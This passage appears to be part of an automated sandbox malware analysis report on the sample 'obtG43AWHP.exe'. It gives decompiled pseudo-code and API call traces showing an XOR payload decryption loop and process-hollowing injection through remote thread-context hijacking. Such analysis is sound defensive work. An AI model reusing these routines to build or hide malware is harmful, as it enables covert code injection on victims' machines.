      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 00418450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
    C-Code - Quality: 53%
    			E00418450() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t30;
				signed int _t33;
				void* _t37;
				void* _t38;
				intOrPtr _t42;
				void* _t47;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t42;
				GetSystemInfo( &_v40);
				_t33 = 0;
				_t30 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t33 == 0x20) {
						_t33 = 0;
					}
					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
					_t33 = _t33 + 1;
					_t15 = _t15 + 1;
					_t30 = _t30 - 1;
				} while (_t30 != 0);
				L4:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t37);
				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
				goto L4;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040BC54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
				void* _t6;
				void* _t13;
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t22;

				_t17 = __edx;
				if(__edx != 0) {
					_t22 = _t22 + 0xfffffff0;
					_t6 = E00403404(_t6, _t21);
				}
				_t20 = _t6;
				E004030E4(0);
				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
				 *(_t20 + 0x18) = 0xffffffff;
				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
				_t13 = _t20;
				if(_t17 != 0) {
					E0040345C(_t13);
					_pop( *[fs:0x0]);
				}
				return _t20;
			}









    0x0040bc54
    0x0040bc58
    0x0040bc5a
    0x0040bc5d
    0x0040bc5d
    0x0040bc64
    0x0040bc6a
    0x0040bc6f
    0x0040bc83
    0x0040bc93
    0x0040bc96
    0x0040bca9
    0x0040bcac
    0x0040bcb0
    0x0040bcb2
    0x0040bcb7
    0x0040bcbe
    0x0040bcc5

    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 004179B4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
				void* _t3;

				L0040C518();
				if(__eax != 0) {
					_t3 = E0040A56C("WSACleanup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x004179b4
    0x004179bb
    0x004179c9
    0x004179ce
    0x00000000
    0x004179ce
    0x004179d3

    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040F0A8, Relevance: 5.1, Strings: 4, Instructions: 85
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				void* _v8;
				char _v264;
				char _v520;
				char _v524;
				signed char _t47;
				intOrPtr* _t59;
				intOrPtr _t61;
				intOrPtr* _t75;
				void* _t78;

				_v524 = 0;
				_t75 = __edx;
				_t47 = __eax;
				_push(_t78);
				_push(0x40f1ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xfffffdf8;
				_t73 = __eax & 0x00000fff;
				if((__eax & 0x00000fff) > 0x14) {
					if(__eax != 0x100) {
						if(__eax != 0x101) {
							if(E0040F504(__eax,  &_v8) == 0) {
								E00407110( &_v524, 4);
								_t59 =  *0x4530ec; // 0x419128
								E00404194(_t75, _v524,  *_t59);
							} else {
								E00403064( *_v8,  &_v520);
								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
								E004040EC(__edx,  &_v264);
							}
						} else {
							E00403EDC(__edx, 0x40f1f4);
						}
					} else {
						E00403EDC(__edx, "String");
					}
				} else {
					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
				}
				if((_t47 & 0x00000020) != 0) {
					E00404194(_t75,  *_t75, "Array ");
				}
				if((_t47 & 0x00000040) != 0) {
					E00404194(_t75,  *_t75, "ByRef ");
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0040F1D5);
				return E00403E88( &_v524);
			}












    0x0040f0b6
    0x0040f0bc
    0x0040f0be
    0x0040f0c2
    0x0040f0c3
    0x0040f0c8
    0x0040f0cb
    0x0040f0d0
    0x0040f0d9
    0x0040f0f6
    0x0040f10e
    0x0040f12a
    0x0040f175
    0x0040f180
    0x0040f18a
    0x0040f12c
    0x0040f13e
    0x0040f153
    0x0040f160
    0x0040f160
    0x0040f110
    0x0040f117
    0x0040f117
    0x0040f0f8
    0x0040f0ff
    0x0040f0ff
    0x0040f0db
    0x0040f0e7
    0x0040f0e7
    0x0040f192
    0x0040f19d
    0x0040f19d
    0x0040f1a5
    0x0040f1b0
    0x0040f1b0
    0x0040f1b7
    0x0040f1ba
    0x0040f1bd
    0x0040f1cd

    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0041381C, Relevance: 5.1, Strings: 4, Instructions: 71
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char* _t15;
				char* _t23;
				intOrPtr _t30;
				char _t31;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t45;

				_v12 = 0;
				_t23 = __edx;
				_push(_t45);
				_push(0x4138c2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xfffffff8;
				_v8 = 0;
				if(__edx != 0) {
					_t39 = __eax;
					while( *_t23 != 0) {
						_t15 = _t23;
						while(1) {
							_t31 =  *_t23;
							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
								break;
							}
							_t23 = _t23 + 1;
						}
						E00403F78( &_v12, _t23 - _t15, _t15);
						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
							_t42 = _t39;
						}
						if(_t42 != 0) {
							if( *_t23 == 0x2e) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x2d) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x3e) {
								_t23 = _t23 + 1;
							}
							_t39 = _t42;
							continue;
						}
						goto L19;
					}
					_v8 = _t39;
				}
				L19:
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(E004138C9);
				return E00403E88( &_v12);
			}












    0x00413827
    0x0041382a
    0x00413830
    0x00413831
    0x00413836
    0x00413839
    0x0041383e
    0x00413843
    0x00413845
    0x004138a4
    0x00413849
    0x0041384e
    0x0041384e
    0x00413852
    0x00000000
    0x00000000
    0x0041384d
    0x0041384d
    0x00413864
    0x00413873
    0x00413877
    0x0041388a
    0x0041388a
    0x0041388e
    0x00413893
    0x00413895
    0x00413895
    0x00413899
    0x0041389b
    0x0041389b
    0x0041389f
    0x004138a1
    0x004138a1
    0x004138a2
    0x00000000
    0x004138a2
    0x00000000
    0x0041388e
    0x004138a9
    0x004138a9
    0x004138ac
    0x004138ae
    0x004138b1
    0x004138b4
    0x004138c1

    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0041498C, Relevance: 5.0, Strings: 4, Instructions: 50
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
				signed int _t7;
				void* _t8;
				void* _t17;
				void* _t29;

				_push(__ecx);
				_t29 = __edx;
				_t17 = __eax;
				_t7 = E004155CC(__ecx) & 0x0000007f;
				if(_t7 > 0xd) {
					L7:
					_t8 = E00413A2C();
				} else {
					_t1 = _t7 + E004149B3; // 0x5
					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
						case 0:
							goto L7;
						case 1:
							E00413F54(_t17, 1, _t30);
							E00403F78(_t29,  *_t30, 0);
							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
							goto L8;
						case 2:
							__eax = __esi;
							__edx = 0x414a58;
							__eax = E00403EDC(__esi, 0x414a58);
							goto L8;
						case 3:
							__eax = __esi;
							__edx = 0x414a68;
							__eax = E00403EDC(__esi, 0x414a68);
							goto L8;
						case 4:
							__eax = __esi;
							__edx = 0x414a78;
							__eax = E00403EDC(__esi, 0x414a78);
							goto L8;
						case 5:
							__eax = __esi;
							__edx = 0x414a84;
							__eax = E00403EDC(__esi, 0x414a84);
							goto L8;
					}
				}
				L8:
				return _t8;
			}







    0x0041498e
    0x0041498f
    0x00414991
    0x0041499a
    0x004149a0
    0x00414a44
    0x00414a44
    0x004149a6
    0x004149a6
    0x004149ac
    0x00000000
    0x00000000
    0x00000000
    0x004149e2
    0x004149f0
    0x00414a05
    0x00000000
    0x00000000
    0x00414a0c
    0x00414a0e
    0x00414a13
    0x00000000
    0x00000000
    0x00414a1a
    0x00414a1c
    0x00414a21
    0x00000000
    0x00000000
    0x00414a28
    0x00414a2a
    0x00414a2f
    0x00000000
    0x00000000
    0x00414a36
    0x00414a38
    0x00414a3d
    0x00000000
    0x00000000
    0x004149ac
    0x00414a49
    0x00414a4c

    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd
    Function 0040AC28, Relevance: 5.0, Strings: 4, Instructions: 28
    C-Code - Quality: 100%
    			E0040AC28() {
				intOrPtr* _t5;
				intOrPtr* _t6;
				intOrPtr* _t7;
				intOrPtr* _t8;
				intOrPtr* _t9;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t16;
				intOrPtr* _t17;
				intOrPtr* _t18;

				_t12 =  *0x452f70; // 0x405e70
				 *0x45478c = E0040A628(_t12, 1);
				_t13 =  *0x453040; // 0x405ef0
				 *0x454790 = E0040A628(_t13, 1);
				_t5 =  *0x452f34; // 0x454008
				 *_t5 = 0x40a7a4;
				_t6 =  *0x452fa8; // 0x454004
				 *_t6 = E0040AC18;
				_t7 =  *0x452f64; // 0x45401c
				_t16 =  *0x406188; // 0x4061d4
				 *_t7 = _t16;
				_t8 =  *0x452f98; // 0x45400c
				 *_t8 = E0040A968;
				_t9 =  *0x452fac; // 0x454010
				 *_t9 = E0040AB4C;
				_t17 =  *0x453054; // 0x454020
				 *_t17 = E0040A8B4;
				_t18 =  *0x452f24; // 0x454028
				 *_t18 = E0040A8D0;
				return E0040A8D0;
			}













    0x0040ac28
    0x0040ac3a
    0x0040ac3f
    0x0040ac51
    0x0040ac56
    0x0040ac5b
    0x0040ac61
    0x0040ac66
    0x0040ac6c
    0x0040ac71
    0x0040ac77
    0x0040ac79
    0x0040ac7e
    0x0040ac84
    0x0040ac89
    0x0040ac94
    0x0040ac9a
    0x0040aca1
    0x0040aca7
    0x0040aca9

    Strings
    Memory Dump Source
    • Source File: 00000014.00000002.1556918974.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_20_2_400000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3424 Parent PID: 3412

    Executed Functions

    Function 0024E080, Relevance: 16.7, APIs: 11, Instructions: 244
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0024E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0024E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0024E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0024E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0024E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0024E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0024E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0024E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0024E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0024E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0024E35A
    Memory Dump Source
    • Source File: 00000015.00000002.1565606818.0024D000.00000040.sdmp, Offset: 0024D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_21_2_24d000_obtG43AWHP.jbxd
    Function 0024E380, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0024E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0024E4B6
      • Part of subcall function 0024E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0024E0C6
      • Part of subcall function 0024E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0024E0DC
      • Part of subcall function 0024E080: CreateProcessA.KERNEL32(?,00000000), ref: 0024E1C2
      • Part of subcall function 0024E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0024E1F0
    Strings
    Memory Dump Source
    • Source File: 00000015.00000002.1565606818.0024D000.00000040.sdmp, Offset: 0024D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_21_2_24d000_obtG43AWHP.jbxd
    Function 0024E510, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0024E54C
      • Part of subcall function 0024E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0024E493
      • Part of subcall function 0024E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0024E4B6
    Strings
    Memory Dump Source
    • Source File: 00000015.00000002.1565606818.0024D000.00000040.sdmp, Offset: 0024D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_21_2_24d000_obtG43AWHP.jbxd

    Non-executed Functions

    Function 0024DFB2, Relevance: .1, Instructions: 61
    Memory Dump Source
    • Source File: 00000015.00000002.1565606818.0024D000.00000040.sdmp, Offset: 0024D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_21_2_24d000_obtG43AWHP.jbxd

    Analysis Process: obtG43AWHP.exe PID: 3440 Parent PID: 3424

    Executed Functions

    Function 00404FC0, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 184
    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x4050c5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00404E08( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E004050CC);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401248();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401250();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401248();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401248();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401248();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























    0x00404fc1
    0x00404fc3
    0x00404fcb
    0x00404fdc
    0x00404fe1
    0x00404ffa
    0x00405001
    0x00405043
    0x00405045
    0x00405046
    0x0040504b
    0x0040504e
    0x00405051
    0x00405063
    0x00405086
    0x004050a6
    0x004050a6
    0x004050aa
    0x004050b0
    0x004050b3
    0x004050b6
    0x004050c4
    0x00405003
    0x00405018
    0x0040501f
    0x00000000
    0x00405021
    0x00405036
    0x0040503d
    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512b
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00405143
    0x004051ed
    0x00000000
    0x00000000
    0x00000000
    0x0040503d
    0x0040501f

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
